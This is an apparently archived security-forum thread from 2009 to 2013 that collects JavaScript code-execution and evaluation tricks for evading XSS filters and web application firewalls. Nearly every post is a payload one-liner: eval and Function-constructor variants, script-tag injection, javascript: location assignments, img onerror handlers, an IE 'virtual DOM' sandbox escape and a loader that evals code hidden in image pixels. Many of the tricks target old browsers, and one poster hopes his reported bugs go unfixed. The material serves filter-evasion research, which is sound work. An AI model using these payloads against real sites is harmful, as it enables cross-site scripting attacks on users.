Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Code Execution/Evaluation (rev 41)
Posted by: sirdarckcat
Date: June 08, 2009 02:29AM

/*
* I will be updating this thread when I have time with the replies.. any mods feel free to help.
*/


//Direct execution
window["alert"](1);//this["alert"],self["alert"],etc.. see references to window
self[<>alert</>](1);//JS1.6+ (E4X XML literal, converts to the string "alert")
self[<><![CDATA[alert]]></>](1);
top/**/['\x61\x6c\x65\x72\x74']/**/(1);
\u0061lert(1),alert\u000a(1);
(ä=#1={}&&alert)(ä);//ff only (sharp variable syntax)
alert.valueOf().call(self,1);
[alert.valueOf()][0].valueOf()(1);
{x/*@cc_on=alert@*/}x/*@(/xss/@*/); // ie only (conditional compilation comments)
({__noSuchMethod__:Function}).aaaaa$$$$$$$$$dddddddfffffff_____("alert(1)")()//ff only
//ff only
location.__noSuchMethod__=location.replace;location["javascript:alert(1)"]();
window.__noSuchMethod__=setTimeout;window["alert(2)"]();
""+{toString:alert}//code execution with no [=()], doesn't work on FF with native functions
1*({valueOf:alert})//code execution with no [=()], doesn't work on FF with native functions
a setter=alert;a="hello";// function execution without [()] ff only (legacy SpiderMonkey setter syntax)


//Evaluate code
eval("alert(1)");
setTimeout("alert(1)");
setInterval("alert(1)");//lots of alerts..
Function("alert(1)")();
self[(typeof prompt).replace(/^./,String.toUpperCase)]("alert(1)")();//builds the name "Function"
[].constructor.constructor('alert(1)')();//Array -> Function.prototype.constructor
execScript("alert(1)");//IE only
window[<>eval</>](name);//JS1.6+
'alert("xss")'.replace(/.*/g,eval)


//Generate/add script tags
with(document)body.previousSibling.appendChild(createElement('script')).src='URL'
with(document)querySelector('head').appendChild(createElement('script')).src='URL'
with(a=<script />)a.@src='URL',a.toXMLString();//FF only, generates the string only (doesn't execute)
with(document)body.previousSibling.appendChild(createElementNS('http://www.w3.org/1999/xhtml','html:script')).src='URL'


//Virtual DOM (execution before appendChild, for escaping sandboxes)
//IE only
document.createElement("html").appendChild(document.createElement("script")).text="alert('ie sucks')";
document.createElement("html").appendChild(document.createElement("script")).setAttribute('src','//0x.lv');

//WebKit only (Chrome/Safari)
document.createElementNS("http://www.w3.org/1999/xhtml","html").innerHTML='<html:head><meta http-equiv="Refresh" content="0;URL=javascript:alert(/HACKED/);"></html:head>';

//FF only
document.createElement("pre").innerHTML="<img onerror='alert(1)' src='.'/>";
with(new Image)setAttribute('onerror','alert(1)'),src='.';
with(document.createElement("img"))setAttribute('onerror','alert(1)'),setAttribute('src','.');
new Option().innerHTML="<img src='.' onerror=alert(1)>";//tip: [new Option][0][name]=location.hash // name=innerHTML location.hash=<img src...

// Opera only
new Image().src="javascript:alert(1234)";
document.createElement('img').src="javascript:alert(1234)";


//Location
location='javascript:alert(1)';
location.assign('javascript:alert(1)');
location.replace('javascript:alert(1)');
// supposing the url is http://victim/asdf/#%0aalert(1) (ie only)
location.protocol='javascript';
document.URL='javascript:alert(1)';//ie
location=Namespace('javascript:\x61lert(1)').uri//ff (E4X Namespace object)
frameElement.src='javascript:alert(1)';/*requires to be framed in same origin (frame a page with a frame and do frames[0].frames[0].location="xss victim")*/


//Etc..
<meta http-equiv=refresh content=,url=xss.swf>
document.styleSheets(0).cssText=name;//IE only

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 41 time(s). Last edit at 06/10/2010 09:17AM by sirdarckcat.

Re: Code Execution/Evaluation
Posted by: Gareth Heyes
Date: June 08, 2009 11:13AM

IE only:-
document.styleSheets(0).cssText=name

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Code Execution/Evaluation (rev 10)
Posted by: sirdarckcat
Date: June 29, 2009 05:30AM

Virtual/Phantom/Ghost DOM

IE only:
document.createElement("html").appendChild(document.createElement("script")).text="alert('i suck')";

WebKit only (Chrome/Safari):
document.createElementNS("http://www.w3.org/1999/xhtml","html").innerHTML='<html:head><meta http-equiv="Refresh" content="0;URL=javascript:alert(/HACKED/);"></html:head>';

This is terrific for escaping sandboxes.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Code Execution/Evaluation (rev 19)
Posted by: sirdarckcat
Date: July 02, 2009 10:33PM

added location section to the post

and I reported to webkit and gecko's teams about this stuff..

https://bugzilla.mozilla.org/show_bug.cgi?id=502173
https://bugs.webkit.org/show_bug.cgi?id=26825

hopefully they won't fix it.. haha

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 07/03/2009 03:22AM by sirdarckcat.

Re: Code Execution/Evaluation (rev 39)
Posted by: hoshikuzu
Date: September 13, 2009 02:33AM

//Location
/* hidden location method (only IE) */

[location(name)]
+location(name)
location(name)? true : false
typeof location(name)
location(name)|1
!location(name)
~~location(name)
/(?!)/(location(name))

/*does not work*/
location(name) //does not work

Re: Code Execution/Evaluation (rev 39)
Posted by: Anonymous User
Date: September 13, 2009 05:18PM

<html>
<body>
<img id="i" onload="a()" src="alert.png"/>
<canvas id="c"/>
<script>
    function a() {
        c=document.getElementById("c"),x=c.getContext("2d"),i=document.getElementById("i")
        x.drawImage(i, 0, 0),d=x.getImageData(0, 0, 3, 3),p=''
        for(y in d.data) {
            if(d.data[y] > 0 && d.data[y] < 255) {
                p+=String.fromCharCode(d.data[y])
            }
        }
        eval(p)
    }
</script>
</body>
</html>

http://img183.imageshack.us/img183/2125/alert.png

:D

Re: Code Execution/Evaluation (rev 39)
Posted by: sirdarckcat
Date: September 13, 2009 11:52PM

that would be.. ways to make a string, wouldn't it?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Code Execution/Evaluation (rev 39)
Posted by: Anonymous User
Date: September 14, 2009 02:49AM

Feel free to move it - I find it hard to determine what to put where sometimes.

Re: Code Execution/Evaluation (rev 39)
Posted by: sirdarckcat
Date: September 14, 2009 03:32AM

hmm, we could merge both threads in one, what do u think?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Code Execution/Evaluation (rev 39)
Posted by: Gareth Heyes
Date: September 14, 2009 10:25AM

I dunno I think it makes sense as the string one should be used for stuff like:-

/test/[-1]

and this one for stuff like mario posted

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Code Execution/Evaluation (rev 39)
Posted by: sirdarckcat
Date: September 14, 2009 08:43PM

ok :) agreed

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 09/14/2009 08:44PM by sirdarckcat.

Re: Code Execution/Evaluation (rev 39)
Posted by: Anonymous User
Date: December 03, 2009 05:03PM

Opera 10 - what else :D

window.onload=function(){document.execCommand("inserthtml",0,"<img src=x onerror=alert(document.domain)>")}

setTimeout(/document.execCommand('inserthtml',0,"<img src=x onerror=alert(1)>")/.source)

Re: Code Execution/Evaluation (rev 39)
Posted by: sirdarckcat
Date: December 04, 2009 09:11AM

frameElement.src='javascript:...

works everywhere, nice replacement for location=..

requires to be framed in same origin (just frame a page with a frame and do frames[0].frames[0].location="xss victim")

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Code Execution/Evaluation (rev 40)
Posted by: SW
Date: January 25, 2010 06:21PM

^ Is this some new kind of targeted spam?


Anyways cool thread, really expanded my knowledge of js trying to figure them all out, especially these "no alnum" ones.

Re: Code Execution/Evaluation (rev 40)
Posted by: Anonymous User
Date: January 26, 2010 03:47AM

I have no idea - looks like it. Aaaaand gone!

Re: Code Execution/Evaluation (rev 40)
Posted by: sirdarckcat
Date: June 10, 2010 09:16AM

location.__noSuchMethod__=location.replace;location["javascript:alert(1)"]();
window.__noSuchMethod__=setTimeout;window["alert(2)"]();

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Code Execution/Evaluation (rev 41)
Posted by: Gareth Heyes
Date: June 28, 2010 09:38AM

IE7:-
document.body.setExpression("xss",'MsgBox(xss)REM 123','VBScript');

Opera:-
document.body.background='javascript:alert(1)';

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 06/29/2010 07:46AM by Gareth Heyes.

Re: Code Execution/Evaluation (rev 41)
Posted by: Gareth Heyes
Date: July 05, 2010 10:02AM

this.watch('alert(1)',eval)/++this['alert(1)']

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Code Execution/Evaluation (rev 41)
Posted by: Gareth Heyes
Date: July 20, 2010 08:39AM

function::['x']setter=eval;
x='alert(1)';

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Code Execution/Evaluation (rev 41)
Posted by: Anonymous User
Date: August 31, 2010 03:29PM

Proxy.create({get:Function('\u0061l\u0065rt\u00281\u0029')})[9999]; // FF4b5pre

Re: Code Execution/Evaluation (rev 41)
Date: September 01, 2010 03:30AM

x = '@mozilla.org/js/function'
x::['alert'](1)

x = ''
window.x::alert(1)

x = undefined
window.x::alert(1)

x = []
window.x::alert(1)

default xml namespace = '@mozilla.org/js/function'
x = undefined
x::alert(1)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: Code Execution/Evaluation (rev 41)
Posted by: Gareth Heyes
Date: April 15, 2011 11:34AM

document.currentScript.parentNode.innerHTML='<img src=1 onerror=alert(1)>';

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Code Execution/Evaluation (rev 41)
Posted by: hack2012
Date: June 04, 2013 08:59PM

Thanks, it's very useful for me!

For more WAF bypass please visit my blog:

http://www.waitalone.cn/tag/bypass

I am from China!
